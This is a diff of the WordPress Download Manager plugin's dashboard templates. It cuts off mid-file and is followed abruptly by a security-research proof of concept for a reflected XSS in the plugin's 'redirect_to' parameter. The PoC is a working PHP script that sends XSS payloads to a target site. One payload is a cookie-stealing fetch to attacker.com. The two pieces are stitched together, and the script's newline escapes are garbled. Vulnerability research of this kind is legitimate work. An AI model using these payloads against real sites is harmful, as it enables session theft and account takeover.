+                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
+                    </div>
+                    <div class="media-body">
+                        <small class="text-muted d-block"><?php esc_html_e('Reset Timer', 'download-manager'); ?></small>
+                        <strong><?php echo do_shortcode("[wpdm_download_limit_reset_timer]"); ?></strong>
+                    </div>
+                </div>
             </div>
         </div>
     </div>
-    <div class="col-md-4">
-        <div class="card card-default dashboard-card">
-            <div class="card-header"><?php _e('Download Limit', 'download-manager'); ?></div>
-            <div class="card-body">
-			    <?php echo do_shortcode("[wpdm_user_download_count]") ?> / <?php echo do_shortcode("[wpdm_user_download_limit]") ?>
+    <div class="col-md-6 mb-2">
+        <div class="card h-100">
+            <div class="card-body py-3">
+                <div class="media">
+                    <div class="mr-3 text-warning">
+                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="7 10 12 15 17 10"></polyline><line x1="12" y1="15" x2="12" y2="3"></line></svg>
+                    </div>
+                    <div class="media-body">
+                        <small class="text-muted d-block"><?php esc_html_e('Download Limit', 'download-manager'); ?></small>
+                        <strong><?php echo do_shortcode("[wpdm_user_download_count]"); ?> / <?php echo do_shortcode("[wpdm_user_download_limit]"); ?></strong>
+                    </div>
+                </div>
             </div>
         </div>
     </div>
 </div>
 <?php endif; ?>
-<div class="card card-default dashboard-card">
-    <div class="card-header bg-white"><?php echo __( "Download History", "download-manager" ); ?></div>
-    <table class="table">
-        <thead>
-        <tr>
-            <th><?php _e( "Package / File" , "download-manager" ); ?></th>
-            <th><?php _e( "Download Time" , "download-manager" ); ?></th>
-            <th><?php _e( "IP" , "download-manager" ); ?></th>
-        </tr>
-        </thead>
-        <tbody>
-        <?php
-        global $wp_rewrite, $wp_query;
-        $items_per_page = 30;
-        $start = isset($_GET['pgd'])?($_GET['pgd']-1)*$items_per_page:0;
-        $res = $wpdb->get_results("select p.post_title,s.* from {$wpdb->prefix}posts p, {$wpdb->prefix}ahm_download_stats s where s.uid = '{$current_user->ID}' and s.pid = p.ID order by `timestamp` desc limit $start, $items_per_page");
-        foreach($res as $stat){
-            ?>
-            <tr>
-                <td>
-                    <a class="p-0 d-block mb-1" href="<?php echo get_permalink($stat->pid); ?>"><?php echo $stat->post_title; ?></a>
-                    <div class="text-muted text-small"><i class="far fa-arrow-alt-circle-down mr-1"></i><em><?= __::mask($stat->filename, '...', -20, false) ?: 'Package' ?></em></div>
-                </td>
-                <td><?php echo date_i18n(get_option('date_format')." h:i A",$stat->timestamp + __::timezoneOffset()); ?></td>
-                <td><?php echo $stat->ip; ?></td>
-            </tr>
-            <?php
-        }
-        ?>

-        </tbody>
-    </table>
-    <div class="card-footer">
-        <?php
-
-            isset($_GET['pgd']) && $_GET['pgd'] > 1 ? $current = $_GET['pgd'] : $current = 1;
-            $pagination = array(
-                'base' => @add_query_arg('pgd','%#%'),
+<!-- Download History Card -->
+<div class="wpdm-card">
+    <div class="wpdm-card-header">
+        <h3>
+            <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
+            <?php esc_html_e('Download History', 'download-manager'); ?>
+        </h3>
+        <?php if ($total_items > 0): ?>
+        <span class="wpdm-badge wpdm-badge--info"><?php echo number_format($total_items); ?> <?php esc_html_e('total', 'download-manager'); ?></span>
+        <?php endif; ?>
+    </div>
+
+    <?php if (!empty($downloads)): ?>
+    <div class="wpdm-table-wrap">
+        <table class="wpdm-table">
+            <thead>
+                <tr>
+                    <th><?php esc_html_e('Package / File', 'download-manager'); ?></th>
+                    <th class="wpdm-hide-mobile"><?php esc_html_e('Download Time', 'download-manager'); ?></th>
+                    <th class="wpdm-hide-mobile" style="width: 120px;"><?php esc_html_e('IP Address', 'download-manager'); ?></th>
+                </tr>
+            </thead>
+            <tbody>
+                <?php foreach ($downloads as $stat): ?>
+                <tr>
+                    <td>
+                        <div class="wpdm-product-cell">
+                            <a class="wpdm-table-link wpdm-product-name" href="<?php echo esc_url(get_permalink($stat->pid)); ?>">
+                                <?php echo esc_html($stat->post_title); ?>
+                            </a>
+                            <?php if (!empty($stat->filename)): ?>
+                            <span class="wpdm-file-meta">
+                                <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline></svg>
+                                <?php echo esc_html(__::mask($stat->filename, '...', -25, false) ?: 'Package'); ?>
+                            </span>
+                            <?php endif; ?>
+                            <span class="wpdm-mobile-meta wpdm-show-mobile">
+                                <?php echo date_i18n(get_option('date_format') . ' H:i', $stat->timestamp + __::timezoneOffset()); ?>
+                            </span>
+                        </div>
+                    </td>
+                    <td class="wpdm-hide-mobile">
+                        <span class="wpdm-date"><?php echo date_i18n(get_option('date_format') . ' H:i', $stat->timestamp + __::timezoneOffset()); ?></span>
+                    </td>
+                    <td class="wpdm-hide-mobile">
+                        <span class="wpdm-ip"><?php echo esc_html($stat->ip); ?></span>
+                    </td>
+                </tr>
+                <?php endforeach; ?>
+            </tbody>
+        </table>
+    </div>
+
+    <?php if ($total_pages > 1): ?>
+    <div class="wpdm-card-footer">
+        <div class="wpdm-pagination">
+            <?php
+            $pagination_args = array(
+                'base' => add_query_arg('pgd', '%#%'),
                 'format' => '',
-                'total' => ceil($wpdb->get_var("select count(*) from {$wpdb->prefix}ahm_download_stats where uid = '{$current_user->ID}'")/$items_per_page),
-                'current' => $current,
+                'total' => $total_pages,
+                'current' => $current_page,
                 'show_all' => false,
-                'type' => 'list',
-                'prev_next'    => True,
-                'prev_text' => '<i class="icon icon-angle-left"></i> '.__( "Previous", "download-manager" ),
-                'next_text' => __( "Next", "download-manager" ).' <i class="icon icon-angle-right"></i>',
+                'end_size' => 1,
+                'mid_size' => 2,
+                'prev_next' => true,
+                'prev_text' => '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="15 18 9 12 15 6"></polyline></svg>',
+                'next_text' => '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="9 18 15 12 9 6"></polyline></svg>',
+                'type' => 'plain',
             );
+            echo paginate_links($pagination_args);
+            ?>
+        </div>
+    </div>
+    <?php endif; ?>

-            //if( $wp_rewrite->using_permalinks() && !is_search())
-            //    $pagination['base'] = user_trailingslashit( trailingslashit( remove_query_arg('s',get_pagenum_link(1) ) ) . 'paged=%#%', 'paged');
-
-            if( !empty($wp_query->query_vars['s']) )
-                $pagination['add_args'] = array('s'=>get_query_var('s'));
-
-            echo '<div class="text-center">' . str_replace('<ul class='page-numbers'>','<ul class="pagination pagination-centered page-numbers">', paginate_links($pagination)) . '</div>';
-        ?>
+    <?php else: ?>
+    <div class="wpdm-card-body">
+        <div class="wpdm-empty-state wpdm-empty-state--compact">
+            <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
+            <h4><?php esc_html_e('No download history', 'download-manager'); ?></h4>
+            <p><?php esc_html_e("You haven't downloaded any files yet.", 'download-manager'); ?></p>
+        </div>
     </div>
+    <?php endif; ?>
 </div>
+
+<?php do_action("wpdm_after_download_history"); ?>
+
+<style>
+.wpdm-file-meta {
+    display: inline-flex;
+    align-items: center;
+    gap: 0.375rem;
+    font-size: 0.8125rem;
+    color: #64748b;
+}
+.wpdm-file-meta svg {
+    color: #94a3b8;
+}
+.wpdm-mobile-meta {
+    display: none;
+    font-size: 0.75rem;
+    color: #94a3b8;
+    margin-top: 0.25rem;
+}
+@media (max-width: 768px) {
+    .wpdm-show-mobile {
+        display: block;
+    }
+}
+.wpdm-pagination {
+    display: flex;
+    justify-content: center;
+    align-items: center;
+    gap: 0.25rem;
+    flex-wrap: wrap;
+}
+.wpdm-pagination a,
+.wpdm-pagination span {
+    display: inline-flex;
+    align-items: center;
+    justify-content: center;
+    min-width: 36px;
+    height: 36px;
+    padding: 0 0.75rem;
+    font-size: 0.875rem;
+    font-weight: 500;
+    color: #475569;
+    background: #fff;
+    border: 1px solid #e2e8f0;
+    border-radius: 0.5rem;
+    text-decoration: none;
+    transition: all 0.15s ease;
+}
+.wpdm-pagination a:hover {
+    background: #f1f5f9;
+    border-color: #cbd5e1;
+    color: #1e293b;
+}
+.wpdm-pagination .current {
+    background: var(--wpdm-primary, #008fef);
+    border-color: var(--wpdm-primary, #008fef);
+    color: #fff;
+}
+.wpdm-pagination .prev,
+.wpdm-pagination .next {
+    padding: 0;
+    min-width: 36px;
+}
+.wpdm-pagination .dots {
+    border: none;
+    background: transparent;
+    color: #94a3b8;
+}
+</style>
--- a/download-manager/src/User/views/dashboard/edit-profile.php
+++ b/download-manager/src/User/views/dashboard/edit-profile.php
@@ -1,83 +1,209 @@
 <?php
+/**
+ * User Dashboard - Edit Profile
+ * Enterprise-grade design
+ */
+
+if (!defined('ABSPATH')) die();
+
 global $current_user, $wpdb;
 $user = get_userdata($current_user->ID);
-
+$public_profile = get_user_meta(get_current_user_id(), '__wpdm_public_profile', true);
+$profile_pic = wpdm_valueof($public_profile, 'logo');
 ?>

 <div id="edit-profile-form">
     <form method="post" id="edit_profile" name="contact_form" action="" class="form">
         <?php wp_nonce_field(NONCE_KEY, '__wpdm_epnonce'); ?>
-        <div class="card card-default dashboard-card">
-            <div class="card-header bg-white">
-                <i class="fa fa-user-edit title-icon color-primary mr-2"></i><?= __('Basic Profile', WPDM_TEXT_DOMAIN); ?>
-            </div>
-            <div class="card-body">
-                <div class="row">
-                    <div class="col-md-6"><div class="form-group"><label for="name"><?php _e( "Display name:" , WPDM_TEXT_DOMAIN );?> </label><input type="text" class="required form-control" required="required" value="<?php echo esc_attr($user->display_name);?>" name="wpdm_profile[display_name]" id="fname"></div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="username"><?php _e( "Username:" , WPDM_TEXT_DOMAIN );?></label><input type="text" class="required form-control" value="<?php echo $user->user_login;?>" id="username" readonly="readonly"></div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="url"><?php _e( "Title:" , WPDM_TEXT_DOMAIN );?></label><input type="text" class="required form-control" name="wpdm_profile[title]" value="<?php echo esc_attr(get_user_meta($user->ID, '__wpdm_title', true));?>" id="title" ></div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="email"><?php _e( "Email:" , WPDM_TEXT_DOMAIN );?></label><input type="text" class="required form-control" name="wpdm_profile[user_email]" value="<?php echo esc_attr($user->user_email);?>" id="email" ></div></div>
-                    <div class="col-md-12"><div class="form-group"><label for="email"><?php _e( "About Me:" , WPDM_TEXT_DOMAIN );?></label><textarea class="required form-control" name="wpdm_profile[description]" id="description" ><?php echo esc_attr(get_user_meta($user->ID, 'description', true));?></textarea></div></div>
+
+        <!-- Basic Profile Card -->
+        <div class="wpdm-card">
+            <div class="wpdm-card-header">
+                <h3>
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle></svg>
+                    <?php esc_html_e('Basic Profile', 'download-manager'); ?>
+                </h3>
+            </div>
+            <div class="wpdm-card-body">
+                <div class="wpdm-form-grid">
+                    <div class="wpdm-form-group">
+                        <label for="fname"><?php esc_html_e('Display Name', 'download-manager'); ?> <span class="wpdm-required">*</span></label>
+                        <input type="text" class="wpdm-input" required value="<?php echo esc_attr($user->display_name); ?>" name="wpdm_profile[display_name]" id="fname">
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="username"><?php esc_html_e('Username', 'download-manager'); ?></label>
+                        <input type="text" class="wpdm-input wpdm-input--readonly" value="<?php echo esc_attr($user->user_login); ?>" id="username" readonly>
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="title"><?php esc_html_e('Title', 'download-manager'); ?></label>
+                        <input type="text" class="wpdm-input" name="wpdm_profile[title]" value="<?php echo esc_attr(get_user_meta($user->ID, '__wpdm_title', true)); ?>" id="title">
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="email"><?php esc_html_e('Email', 'download-manager'); ?> <span class="wpdm-required">*</span></label>
+                        <input type="email" class="wpdm-input" required name="wpdm_profile[user_email]" value="<?php echo esc_attr($user->user_email); ?>" id="email">
+                    </div>
+                    <div class="wpdm-form-group wpdm-form-group--full">
+                        <label for="description"><?php esc_html_e('About Me', 'download-manager'); ?></label>
+                        <textarea class="wpdm-textarea" name="wpdm_profile[description]" id="description" rows="4"><?php echo esc_textarea(get_user_meta($user->ID, 'description', true)); ?></textarea>
+                    </div>
                 </div>
                 <?php do_action('wpdm_update_profile_filed_html', $user); ?>
                 <?php do_action('wpdm_update_profile_field_html', $user); ?>
             </div>
         </div>

-        <div class="card card-default dashboard-card mt-3">
-            <div class="card-header bg-white">
-                <i class="fa fa-user-circle title-icon color-success mr-2"></i><?php _e( "Profile Picture" , WPDM_TEXT_DOMAIN ); ?>
-            </div>
-            <div class="card-body">
-                <div class="form-group mb-0">
-                    <div class="input-group mb-0">
-                        <input placeholder="<?php esc_attr_e('Select Profile Picture...', 'download-manager'); ?>" type="text" name="__wpdm_profile_pic" id="store-logo" class="form-control" value="<?php echo esc_attr(wpdm_valueof(get_user_meta(get_current_user_id(), '__wpdm_public_profile', true), 'logo')); ?>"/>
-                        <div class="input-group-append">
-                            <button class="btn btn-secondary wpdm-media-upload" type="button" rel="#store-logo"><i class="far fa-image"></i></button>
-                        </div>
+        <!-- Profile Picture Card -->
+        <div class="wpdm-card" style="margin-top: 1.5rem;">
+            <div class="wpdm-card-header">
+                <h3>
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><circle cx="8.5" cy="8.5" r="1.5"></circle><polyline points="21 15 16 10 5 21"></polyline></svg>
+                    <?php esc_html_e('Profile Picture', 'download-manager'); ?>
+                </h3>
+            </div>
+            <div class="wpdm-card-body">
+                <div class="wpdm-avatar-upload">
+                    <div class="wpdm-avatar-preview" id="avatar-preview">
+                        <?php if ($profile_pic): ?>
+                            <img src="<?php echo esc_url($profile_pic); ?>" alt="">
+                        <?php else: ?>
+                            <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle></svg>
+                        <?php endif; ?>
+                    </div>
+                    <div class="wpdm-avatar-actions">
+                        <input type="hidden" name="__wpdm_profile_pic" id="store-logo" value="<?php echo esc_attr($profile_pic); ?>">
+                        <button type="button" class="wpdm-btn wpdm-btn--secondary wpdm-media-upload" rel="#store-logo">
+                            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="17 8 12 3 7 8"></polyline><line x1="12" y1="3" x2="12" y2="15"></line></svg>
+                            <?php esc_html_e('Upload Image', 'download-manager'); ?>
+                        </button>
+                        <button type="button" class="wpdm-btn wpdm-btn--danger wpdm-btn--sm" id="remove-avatar" style="<?php echo $profile_pic ? '' : 'display: none;'; ?>">
+                            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="3 6 5 6 21 6"></polyline><path d="M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"></path></svg>
+                            <?php esc_html_e('Remove', 'download-manager'); ?>
+                        </button>
+                        <p class="wpdm-help-text"><?php esc_html_e('Recommended: Square image, at least 256x256 pixels', 'download-manager'); ?></p>
                     </div>
                 </div>
             </div>
         </div>

-        <div class="card card-default dashboard-card mt-3">
-            <div class="card-header bg-white">
-                <i class="fa fa-key title-icon color-danger mr-2"></i><?php _e( "Update Password" , WPDM_TEXT_DOMAIN ); ?>
-            </div>
-            <div class="card-body">
-                <div class="row">
-                    <div class="col-md-6"><div class="form-group"><label for="new_pass"><?php _e( "New Password:" , WPDM_TEXT_DOMAIN );?> </label><input  autocomplete="off" placeholder="" type="password" class="form-control" value="" name="password" id="new_pass"> </div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="re_new_pass"><?php _e( "Re-type New Password:" , WPDM_TEXT_DOMAIN );?> </label><input autocomplete="off" type="password" value="" class="form-control" name="cpassword" id="re_new_pass"> </div></div>
+        <!-- Password Card -->
+        <div class="wpdm-card" style="margin-top: 1.5rem;">
+            <div class="wpdm-card-header">
+                <h3>
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 10 0v4"></path></svg>
+                    <?php esc_html_e('Update Password', 'download-manager'); ?>
+                </h3>
+            </div>
+            <div class="wpdm-card-body">
+                <div class="wpdm-form-grid">
+                    <div class="wpdm-form-group">
+                        <label for="new_pass"><?php esc_html_e('New Password', 'download-manager'); ?></label>
+                        <input autocomplete="new-password" type="password" class="wpdm-input" value="" name="password" id="new_pass" placeholder="<?php esc_attr_e('Enter new password', 'download-manager'); ?>">
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="re_new_pass"><?php esc_html_e('Confirm Password', 'download-manager'); ?></label>
+                        <input autocomplete="new-password" type="password" class="wpdm-input" value="" name="cpassword" id="re_new_pass" placeholder="<?php esc_attr_e('Re-enter new password', 'download-manager'); ?>">
+                    </div>
+                </div>
+                <div class="wpdm-alert wpdm-alert--info" style="margin-top: 1rem;">
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><line x1="12" y1="16" x2="12" y2="12"></line><line x1="12" y1="8" x2="12.01" y2="8"></line></svg>
+                    <span><?php esc_html_e('Leave empty if you don't want to change your password', 'download-manager'); ?></span>
                 </div>
-                <em class="note"><?php _e( "Keep empty if you don't want to change old password" , WPDM_TEXT_DOMAIN );?></em>
             </div>
         </div>

         <?php do_action("wpdm_edit_profile_form"); ?>

-
-        <div class="card p-3 mt-3">
-            <div class="text-right"><button type="submit" style="min-width: 250px" class="btn btn-lg btn-primary" id="edit_profile_sbtn"><i class="fas fa-hdd"></i>  <?php _e( "Save Changes" , WPDM_TEXT_DOMAIN );?></button></div>
+        <!-- Submit Button -->
+        <div class="wpdm-card wpdm-card--action" style="margin-top: 1.5rem;">
+            <button type="submit" class="wpdm-btn wpdm-btn--primary wpdm-btn--lg" id="edit_profile_sbtn">
+                <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M19 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h11l5 5v11a2 2 0 0 1-2 2z"></path><polyline points="17 21 17 13 7 13 7 21"></polyline><polyline points="7 3 7 8 15 8"></polyline></svg>
+                <?php esc_html_e('Save Changes', 'download-manager'); ?>
+            </button>
         </div>

-
     </form>
-    <div id="edit-profile-msg">
-    </div>
+    <div id="edit-profile-msg"></div>
 </div>
 <div id="wpdm-fixed-top-center"></div>
+
+<style>
+.wpdm-avatar-upload {
+    display: flex;
+    align-items: flex-start;
+    gap: 1.5rem;
+    flex-wrap: wrap;
+}
+.wpdm-avatar-preview {
+    width: 120px;
+    height: 120px;
+    border-radius: 50%;
+    background: linear-gradient(135deg, #f0f9ff 0%, #e0f2fe 100%);
+    display: flex;
+    align-items: center;
+    justify-content: center;
+    overflow: hidden;
+    border: 4px solid #fff;
+    box-shadow: 0 8px 24px rgba(0, 0, 0, 0.12);
+    flex-shrink: 0;
+}
+.wpdm-avatar-preview img {
+    width: 100%;
+    height: 100%;
+    object-fit: cover;
+}
+.wpdm-avatar-preview svg {
+    color: #94a3b8;
+}
+.wpdm-avatar-actions {
+    display: flex;
+    flex-direction: column;
+    align-items: flex-start;
+    gap: 0.75rem;
+}
+.wpdm-avatar-actions .wpdm-help-text {
+    margin: 0;
+}
+</style>
+
 <script>
-    jQuery(function ($) {
-        $('#edit_profile').on('submit', function (e) {
-            e.preventDefault();
-            var edit_profile_sbtn = $('#edit_profile_sbtn').html();
-            $('#edit_profile_sbtn').html(WPDM.el('i', {'class' : 'fa fa-sun fa-spin'}) + " <?= esc_attr__( 'Please Wait...', WPDM_TEXT_DOMAIN ) ?>").attr('disabled','disabled');
-            $(this).ajaxSubmit({
-                success: function (res) {
-                    WPDM.notify(res.msg, res.type, '#wpdm-fixed-top-center', 10000);
-                    $('#edit_profile_sbtn').html(edit_profile_sbtn).removeAttr('disabled');
-                }
-            });
+jQuery(function ($) {
+    // Form submission
+    $('#edit_profile').on('submit', function (e) {
+        e.preventDefault();
+        var $btn = $('#edit_profile_sbtn');
+        var originalHtml = $btn.html();
+        $btn.html('<svg class="wpdm-spin" xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="12" y1="2" x2="12" y2="6"></line><line x1="12" y1="18" x2="12" y2="22"></line><line x1="4.93" y1="4.93" x2="7.76" y2="7.76"></line><line x1="16.24" y1="16.24" x2="19.07" y2="19.07"></line><line x1="2" y1="12" x2="6" y2="12"></line><line x1="18" y1="12" x2="22" y2="12"></line><line x1="4.93" y1="19.07" x2="7.76" y2="16.24"></line><line x1="16.24" y1="7.76" x2="19.07" y2="4.93"></line></svg> <?php echo esc_js(__('Saving...', 'download-manager')); ?>').prop('disabled', true);
+
+        $(this).ajaxSubmit({
+            success: function (res) {
+                WPDM.notify(res.msg, res.type, '#wpdm-fixed-top-center', 10000);
+                $btn.html(originalHtml).prop('disabled', false);
+            },
+            error: function() {
+                $btn.html(originalHtml).prop('disabled', false);
+                WPDM.notify('<?php echo esc_js(__('An error occurred. Please try again.', 'download-manager')); ?>', 'error', '#wpdm-fixed-top-center', 10000);
+            }
         });
     });
+
+    // Avatar preview update
+    $('#store-logo').on('change', function() {
+        var url = $(this).val();
+        var $preview = $('#avatar-preview');
+        var $removeBtn = $('#remove-avatar');
+
+        if (url) {
+            $preview.html('<img src="' + url + '" alt="">');
+            $removeBtn.show();
+        } else {
+            $preview.html('<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle></svg>');
+            $removeBtn.hide();
+        }
+    });
+
+    // Remove avatar
+    $('#remove-avatar').on('click', function() {
+        $('#store-logo').val('').trigger('change');
+    });
+});
 </script>
--- a/download-manager/src/User/views/dashboard/profile.php
+++ b/download-manager/src/User/views/dashboard/profile.php
@@ -1,170 +1,230 @@
 <?php
-global $current_user, $wpdb;
+/**
+ * User Dashboard - Profile/Home
+ * Enterprise-grade design
+ */

-global $wp_roles;
-$roles = array_reverse($wp_roles->role_names);
-$val = get_option( 'wp_user_roles' );
-$levels =  array();
-foreach ($current_user->roles as $role) {
-    $levels[] = isset($roles[$role])?$roles[$role]:$role;
-}
+global $current_user, $wpdb;

+$total_downloads = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d",
+    $current_user->ID
+));
+
+$today_downloads = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d AND `year` = YEAR(CURDATE()) AND `month` = MONTH(CURDATE()) AND `day` = DAY(CURDATE())",
+    $current_user->ID
+));
+
+$this_month_downloads = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d AND `year` = YEAR(CURDATE()) AND `month` = MONTH(CURDATE())",
+    $current_user->ID
+));
 ?>

 <?php do_action("wpdm_before_user_dashboard_summery"); ?>
-<div class="row">
-    <div class="col-md-4">
-        <div class="card bg-primary text-white">
-            <div class="card-header">

-                <?php _e( "User Level" , "download-manager" ); ?>
-            </div>
-            <div class="card-body tab-content">
-                <h3><?

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1666 - Download Manager <= 3.3.46 - Reflected Cross-Site Scripting via 'redirect_to' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-1666
 * Reflected XSS in Download Manager WordPress Plugin via redirect_to parameter
 * 
 * Usage: php poc.php --url https://target-site.com/login-page/
 */

$target_url = ''; // Configure target URL with login page using Download Manager shortcode

// Parse command line arguments
if (php_sapi_name() === 'cli') {
    $options = getopt('', ['url:']);
    if (isset($options['url'])) {
        $target_url = $options['url'];
    }
}

if (empty($target_url)) {
    echo "Usage: php poc.php --url https://target-site.com/login-page/n";
    exit(1);
}

// Malicious payloads to test
$payloads = [
    'javascript:alert(document.domain)',
    'javascript:alert(document.cookie)',
    'JaVaScRiPt:alert("XSS")',
    'javascript:fetch("https://attacker.com/steal?c="+document.cookie)',
    'data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=',
];

echo "[+] Testing CVE-2026-1666 on: $target_urln";
echo "[+] Sending XSS payloads via redirect_to parameternn";

foreach ($payloads as $index => $payload) {
    $test_url = $target_url . (strpos($target_url, '?') === false ? '?' : '&') . "redirect_to=" . urlencode($payload);
    
    echo "Payload #" . ($index + 1) . ": $payloadn";
    echo "Test URL: $test_urln";
    
    // Initialize cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $test_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if (curl_errno($ch)) {
        echo "Error: " . curl_error($ch) . "nn";
    } else {
        echo "HTTP Code: $http_coden";
        
        // Check if payload appears in response (unsanitized)
        $decoded_payload = urldecode($payload);
        if (strpos($response, $decoded_payload) !== false || 
            strpos($response, htmlspecialchars($decoded_payload)) !== false) {
            echo "Result: VULNERABLE - Payload found in responsen";
        } else {
            echo "Result: Possibly patched or payload filteredn";
        }
        
        // Check for JavaScript scheme in response
        if (preg_match('/javascript:/i', $response)) {
            echo "Warning: JavaScript scheme detected in responsen";
        }
    }
    
    echo str_repeat("-", 80) . "nn";
    
    curl_close($ch);
    
    // Rate limiting
    sleep(1);
}

echo "[+] Testing complete. Manual verification required:n";
echo "1. Visit generated URLs in a browsern";
echo "2. Check if JavaScript executesn";
